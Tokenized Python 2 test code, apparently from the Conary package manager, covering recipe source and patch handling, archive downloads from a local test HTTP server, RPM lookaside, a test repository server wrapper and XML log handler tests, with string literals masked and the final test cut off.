"<STR_LIT>" ) <EOL> def testSourceLzop ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> built = self . buildRecipe ( recipestr , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert built <EOL> class TestBadaddSource ( rephelp . RepositoryHelper ) : <EOL> def testBadaddSource ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> def testAddSourceDir ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> class Stop ( Exception ) : <EOL> pass <EOL> def mockDoDownload ( x ) : <EOL> f = x . _findSource ( x . httpHeaders ) <EOL> self . assertEquals ( f , os . path . join ( x . builddir , <EOL> x . recipe . macros . maindir , <EOL> '<STR_LIT:test>' ) ) <EOL> raise Stop <EOL> def mockFindAll ( * args , ** kwargs ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> self . mock ( source . addSource , '<STR_LIT>' , mockDoDownload ) <EOL> self . mock ( lookaside , '<STR_LIT>' , mockFindAll ) <EOL> self . assertRaises ( Stop , self . buildRecipe , <EOL> recipeStr , "<STR_LIT>" ) <EOL> def testAddMaindirPatch ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> def testAddPatchGlob ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> def testAddPatchBadGlob ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except OSError , e : <EOL> if e . errno != <NUM_LIT:2> : <EOL> raise <EOL> self . assertEquals ( str ( e ) , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def testAddPatchSortOrder ( self ) : <EOL> class TestAddPatch ( source . addPatch ) : <EOL> sourceDir = '<STR_LIT:.>' <EOL> def __init__ ( x ) : <EOL> pass <EOL> def _findSource ( x , httpArgs = { } , braceGlob = False ) : <EOL> return [ "<STR_LIT:3>" , "<STR_LIT:2>" , "<STR_LIT:1>" ] <EOL> _checkSignature = lambda * args , ** kwargs : None <EOL> def doFile ( x , path ) : <EOL> self . orderedCalls . append ( path ) <EOL> self . orderedCalls = [ ] <EOL> addPatch = TestAddPatch ( ) <EOL> addPatch . do ( ) <EOL> self . assertEquals ( self . orderedCalls , [ "<STR_LIT:1>" , "<STR_LIT:2>" , "<STR_LIT:3>" ] ) <EOL> def _getHTTPServer ( self , logFile ) : <EOL> class FileHandler ( SimpleHTTPServer . SimpleHTTPRequestHandler ) : <EOL> count = <NUM_LIT:0> <EOL> def log_message ( slf , * args , ** kw ) : <EOL> file ( logFile , "<STR_LIT:a>" ) . write ( "<STR_LIT>" % slf . path ) <EOL> def do_GET ( slf ) : <EOL> if slf . path . endswith ( '<STR_LIT>' ) : <EOL> contentType = '<STR_LIT>' <EOL> archpath = self . workDir + '<STR_LIT>' <EOL> FileHandler . count += <NUM_LIT:1> <EOL> open ( archpath , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % slf . count ) <EOL> elif ( slf . path . startswith ( "<STR_LIT>" ) or <EOL> not slf . path . endswith ( '<STR_LIT>' ) ) : <EOL> slf . send_response ( <NUM_LIT> ) <EOL> slf . end_headers ( ) <EOL> return <EOL> elif slf . path . endswith ( '<STR_LIT>' ) : <EOL> archpath = os . path . join ( resources . get_archive ( ) , "<STR_LIT>" ) <EOL> contentType = "<STR_LIT>" <EOL> else : <EOL> archpath = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> file ( archpath , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> contentType = '<STR_LIT>' <EOL> fileSize = os . stat ( archpath ) . st_size <EOL> slf . send_response ( <NUM_LIT:200> ) <EOL> slf . send_header ( "<STR_LIT:Content-Type>" , contentType ) <EOL> slf . send_header ( "<STR_LIT>" , fileSize ) <EOL> slf . end_headers ( ) <EOL> util . copyStream ( open ( archpath ) , slf . wfile ) <EOL> hs = rephelp . HTTPServerController ( FileHandler ) <EOL> return hs <EOL> def testAddArchiveMultiURL ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> recipestrSrc = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> trv = self . build ( recipestr % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> recipestr2 = recipestr . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> trv = self . build ( recipestr2 % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> recipestr3 = recipestr2 . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> err = self . assertRaises ( errors . CookError , <EOL> self . build , recipestr3 % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> strerr = str ( err ) <EOL> strerr = strerr [ strerr . find ( '<STR_LIT>' ) : ] <EOL> self . assertEqual ( strerr , <EOL> "<STR_LIT>" ) <EOL> recipeData = recipestrSrc % dict ( port = hs . port ) <EOL> trv = self . build ( recipeData , "<STR_LIT>" ) <EOL> self . assertEqual ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] , <EOL> [ '<STR_LIT>' ] ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> open ( "<STR_LIT>" , "<STR_LIT:w>" ) . write ( recipeData ) <EOL> self . commit ( ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testAddArchivePassword ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr % dict ( port = hs . port ) ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> self . refresh ( ) <EOL> self . commit ( ) <EOL> xx = self . cookItem ( self . openRepository ( ) , self . cfg , '<STR_LIT:foo>' ) <EOL> self . updatePkg ( '<STR_LIT:foo>' ) <EOL> self . assertEquals ( open ( self . cfg . root + '<STR_LIT>' ) . read ( ) , '<STR_LIT>' ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testMultiURLMirror ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> mirrorsDir = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> util . mkdirChain ( mirrorsDir ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> self . cfg . mirrorDirs = [ mirrorsDir ] <EOL> try : <EOL> trv = self . build ( recipestr % dict ( rest = '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> self . assertEqual ( lines [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> badUrls = set ( '<STR_LIT:/>' . join ( x . split ( '<STR_LIT:/>' ) [ : <NUM_LIT:3> ] ) for x in lines <EOL> if x . startswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( badUrls , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> file ( logFile , "<STR_LIT>" ) <EOL> util . rmtree ( self . cacheDir , ignore_errors = True ) <EOL> trv = self . build ( recipestr % <EOL> dict ( rest = '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> self . assertEqual ( lines [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> badUrls = set ( '<STR_LIT:/>' . join ( x . split ( '<STR_LIT:/>' ) [ : <NUM_LIT:3> ] ) for x in lines <EOL> if x . startswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( badUrls , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testMirrorLookaside ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> mirrorsDir = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> util . mkdirChain ( mirrorsDir ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> self . cfg . mirrorDirs = [ mirrorsDir ] <EOL> try : <EOL> trv = self . build ( recipestr , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> goodLines = [ x for x in lines if x . startswith ( '<STR_LIT>' ) <EOL> and x . endswith ( '<STR_LIT>' ) ] <EOL> self . assertEqual ( goodLines , <EOL> [ '<STR_LIT>' ] ) <EOL> goodLines = [ x for x in lines if x . endswith ( '<STR_LIT>' ) ] <EOL> self . assertEqual ( goodLines , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> finally : <EOL> hs . close ( ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . assertNotEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> rpmLookaside = open ( os . path . join ( self . cfg . lookaside , <EOL> '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:foo>' ) ) . read ( ) <EOL> self . assertEquals ( rpmLookaside , '<STR_LIT>' ) <EOL> fooLookasidePath = os . path . join ( self . cfg . lookaside , '<STR_LIT:foo>' , '<STR_LIT:foo>' ) <EOL> self . assertFalse ( os . path . exists ( fooLookasidePath ) , <EOL> "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside2 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . assertNotEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> rpmLookaside = open ( os . path . join ( self . cfg . lookaside , <EOL> '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:foo>' ) ) . read ( ) <EOL> self . assertEquals ( rpmLookaside , '<STR_LIT>' ) <EOL> fooLookasidePath = os . path . join ( self . cfg . lookaside , '<STR_LIT:foo>' , '<STR_LIT:foo>' ) <EOL> self . assertEquals ( open ( fooLookasidePath ) . read ( ) , '<STR_LIT>' ) <EOL> self . assertEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside3 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . assertTrue ( '<STR_LIT>' in fileDict [ '<STR_LIT>' ] . read ( ) ) <EOL> self . assertTrue ( '<STR_LIT>' in fileDict [ '<STR_LIT>' ] . read ( ) ) <EOL> self . assertEquals ( set ( fileDict . keys ( ) ) , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside4 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> err = self . assertRaises ( IOError , self . cookItem , repos , self . cfg , '<STR_LIT:foo>' ) <EOL> self . assertEquals ( str ( err ) , <EOL> '<STR_LIT>' ) <EOL> def testRepositoryCookNoDownload ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> repos = self . openRepository ( ) <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( "<STR_LIT>" , recipestr % dict ( port = hs . port ) ) <EOL> self . addfile ( "<STR_LIT>" ) <EOL> self . discardOutput ( self . commit ) <EOL> self . assertEqual ( [ x . strip ( ) for x in file ( logFile ) ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> util . rmtree ( os . path . join ( self . cacheDir , "<STR_LIT>" ) ) <EOL> self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( [ x . strip ( ) for x in file ( logFile ) ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> finally : <EOL> hs . close ( ) <EOL> os . chdir ( origDir ) <EOL> def test_extractFilesFromXzRPM ( self ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> raise testhelp . SkipTestException ( '<STR_LIT>' ) <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvs = [ x for x in built if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> trvs = [ ( x [ <NUM_LIT:0> ] , VFS ( x [ <NUM_LIT:1> ] ) , x [ <NUM_LIT:2> ] ) for x in trvs ] <EOL> repos = self . openRepository ( ) <EOL> trv = repos . getTroves ( trvs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <EOL> sorted ( os . path . basename ( p [ <NUM_LIT:1> ] ) for p in trv . iterFileList ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) </s>
<s> import errno <EOL> import os <EOL> import sys <EOL> from conary . lib import util <EOL> from testutils . servers . gunicorn_server import GunicornServer <EOL> from testutils . servers . uwsgi_server import UwsgiServer <EOL> from testutils . servers . nginx_server import NginxServer <EOL> from conary_test import resources <EOL> class ConaryServer ( object ) : <EOL> cache = None <EOL> reposDB = None <EOL> appServerClasses = { <EOL> '<STR_LIT>' : GunicornServer , <EOL> '<STR_LIT>' : UwsgiServer , <EOL> } <EOL> def __init__ ( self , reposDir , <EOL> sslCertAndKey = None , <EOL> withCache = True , <EOL> singleWorker = False , <EOL> configValues = ( ) , <EOL> ) : <EOL> self . reposDir = os . path . abspath ( reposDir ) <EOL> self . reposLog = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . traceLog = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . configPath = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . contents = ContentStore ( os . path . join ( self . reposDir , '<STR_LIT>' ) ) <EOL> if withCache : <EOL> self . cache = ContentStore ( os . path . join ( self . reposDir , '<STR_LIT>' ) ) <EOL> self . cache . reset ( ) <EOL> self . sslCertAndKey = sslCertAndKey <EOL> if sslCertAndKey is True : <EOL> self . sslCertAndKey = ( <EOL> resources . get_archive ( '<STR_LIT>' ) , <EOL> resources . get_archive ( '<STR_LIT>' ) ) <EOL> name = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> appServerClass = self . appServerClasses [ name ] <EOL> self . appServer = appServerClass ( <EOL> serverDir = os . path . join ( self . reposDir , '<STR_LIT>' ) , <EOL> workers = ( <NUM_LIT:1> if singleWorker else <NUM_LIT:2> ) , <EOL> application = '<STR_LIT>' , <EOL> environ = { <EOL> '<STR_LIT>' : self . configPath , <EOL> } , <EOL> ) <EOL> self . rpServer = NginxServer ( <EOL> serverDir = os . path . join ( self . reposDir , '<STR_LIT>' ) , <EOL> proxyTo = self . appServer . getProxyTo ( ) , <EOL> sslCertAndKey = self . sslCertAndKey , <EOL> ) <EOL> self . configValues = configValues <EOL> self . needsReset = True <EOL> def reset ( self ) : <EOL> self . checkForTracebacks ( ) <EOL> for thing in ( <EOL> self . appServer , <EOL> self . rpServer , <EOL> self . contents , <EOL> self . reposDB , <EOL> self . cache , <EOL> ) : <EOL> if thing : <EOL> thing . reset ( ) <EOL> self . needsReset = False <EOL> def resetIfNeeded ( self ) : <EOL> if self . needsReset : <EOL> self . reset ( ) <EOL> def setNeedsReset ( self ) : <EOL> self . needsReset = True <EOL> def start ( self ) : <EOL> self . needsReset = True <EOL> self . createConfig ( ) <EOL> self . appServer . start ( ) <EOL> self . rpServer . start ( ) <EOL> def stop ( self ) : <EOL> self . checkForTracebacks ( ) <EOL> self . rpServer . stop ( ) <EOL> self . appServer . stop ( ) <EOL> def checkForTracebacks ( self ) : <EOL> try : <EOL> with open ( self . appServer . errorLog ) as f : <EOL> data = f . read ( ) <EOL> if '<STR_LIT>' in data : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , data <EOL> sys . stderr . flush ( ) <EOL> except IOError , err : <EOL> if err . args [ <NUM_LIT:0> ] != errno . ENOENT : <EOL> raise <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + self . traceLog , <EOL> '<STR_LIT>' : self . reposLog , <EOL> '<STR_LIT>' : self . reposDir , <EOL> } <EOL> if self . cache : <EOL> configValues [ '<STR_LIT>' ] = self . cache . getPath ( ) <EOL> configValues . update ( defaultValues ) <EOL> configValues . update ( self . configValues ) <EOL> util . mkdirChain ( os . path . dirname ( self . configPath ) ) <EOL> with open ( self . configPath , '<STR_LIT:w>' ) as f : <EOL> for key , values in configValues . iteritems ( ) : <EOL> if values is None : <EOL> continue <EOL> if not isinstance ( values , list ) : <EOL> values = [ values ] <EOL> for value in values : <EOL> print >> f , key , value <EOL> def getUrl ( self , ssl = True ) : <EOL> return self . rpServer . getUrl ( ssl = ssl ) + '<STR_LIT>' <EOL> class RepositoryServer ( ConaryServer ) : <EOL> def __init__ ( self , reposDir , nameList , reposDB , ** kwargs ) : <EOL> ConaryServer . __init__ ( self , reposDir , ** kwargs ) <EOL> if isinstance ( nameList , str ) : <EOL> nameList = [ nameList ] <EOL> self . nameList = nameList <EOL> self . reposDB = reposDB <EOL> self . needsPGPKey = True <EOL> def getMap ( self , ssl = True ) : <EOL> dest = self . getUrl ( ssl = ssl ) <EOL> d = dict ( ( name , dest ) for name in self . nameList ) <EOL> return d <EOL> def getName ( self ) : <EOL> return self . nameList [ <NUM_LIT:0> ] <EOL> def reset ( self ) : <EOL> super ( RepositoryServer , self ) . reset ( ) <EOL> self . needsPGPKey = True <EOL> def clearNeedsPGPKey ( self ) : <EOL> self . needsPGPKey = False <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : self . contents . path , <EOL> '<STR_LIT>' : self . reposDB . getDriver ( ) , <EOL> '<STR_LIT>' : "<STR_LIT:U+0020>" . join ( self . nameList ) , <EOL> } <EOL> configValues . update ( defaultValues ) <EOL> super ( RepositoryServer , self ) . createConfig ( defaultValues = configValues ) <EOL> class ProxyServer ( ConaryServer ) : <EOL> def __init__ ( self , reposDir , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> ConaryServer . __init__ ( self , reposDir , ** kwargs ) <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : self . contents . path , <EOL> } <EOL> configValues . update ( defaultValues ) <EOL> super ( ProxyServer , self ) . createConfig ( defaultValues = configValues ) <EOL> def addToConfig ( self , configObj ) : <EOL> configObj . configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = False ) ) <EOL> if self . sslCertAndKey : <EOL> configObj . configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = True ) ) <EOL> else : <EOL> configObj . configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = False ) ) <EOL> class ContentStore ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = os . path . abspath ( path ) <EOL> def reset ( self ) : <EOL> util . rmtree ( self . path , ignore_errors = True ) <EOL> util . mkdirChain ( self . path ) <EOL> def getPath ( self ) : <EOL> return self . path </s>
<s> from testrunner import testhelp <EOL> import bz2 <EOL> import gzip <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import threading <EOL> import time <EOL> from conary . lib import xmllog , util , log , logger <EOL> class XmlLogParseTest ( testhelp . TestCase ) : <EOL> def setUp ( self ) : <EOL> fd , self . logfile = tempfile . mkstemp ( ) <EOL> os . close ( fd ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . logger . setLevel ( <NUM_LIT:1> ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> testhelp . TestCase . setUp ( self ) <EOL> def tearDown ( self ) : <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> util . rmtree ( self . logfile ) <EOL> testhelp . TestCase . tearDown ( self ) <EOL> def getLogData ( self ) : <EOL> self . hdlr . flush ( ) <EOL> return open ( self . logfile ) . read ( ) <EOL> def assertSubstring ( self , substr , data ) : <EOL> self . assertFalse ( substr not in data , <EOL> "<STR_LIT>" % ( substr , data ) ) <EOL> def testBasicAttributes ( self ) : <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data , <EOL> "<STR_LIT>" ) <EOL> for messageId in ( <NUM_LIT:0> , <NUM_LIT:1> ) : <EOL> self . assertSubstring ( '<STR_LIT>' % messageId , data ) <EOL> record = data . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> self . assertFalse ( not record . startswith ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( not record . endswith ( '<STR_LIT>' ) ) <EOL> for kw in ( '<STR_LIT>' , '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ) : <EOL> self . assertSubstring ( "<STR_LIT>" % kw , record ) <EOL> self . assertSubstring ( "<STR_LIT>" % kw , record ) <EOL> def testDescriptor ( self ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:test>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . hdlr . popDescriptor ( ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testRecordData ( self ) : <EOL> self . hdlr . addRecordData ( '<STR_LIT>' , <NUM_LIT> ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . assertRaises ( RuntimeError , self . hdlr . addRecordData , '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> self . hdlr . addRecordData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . hdlr . delRecordData ( '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def testTimeFormat ( self ) : <EOL> self . mock ( time , '<STR_LIT:time>' , lambda : <NUM_LIT> ) <EOL> ts = logger . getTime ( ) <EOL> self . assertEquals ( ts , '<STR_LIT>' ) <EOL> self . unmock ( ) <EOL> def testThreadName ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . logger . info ( '<STR_LIT>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testThreadData ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . hdlr . addRecordData ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testThreadDescriptor ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:bar>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testMakeRecord ( self ) : <EOL> record = logger . makeRecord ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT:test>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> self . assertEquals ( record , <EOL> "<STR_LIT>" ) <EOL> def testClose ( self ) : <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> data = open ( self . logfile ) . read ( ) . splitlines ( ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> self . assertEquals ( len ( data ) , <NUM_LIT:5> ) <EOL> self . assertEquals ( data [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . 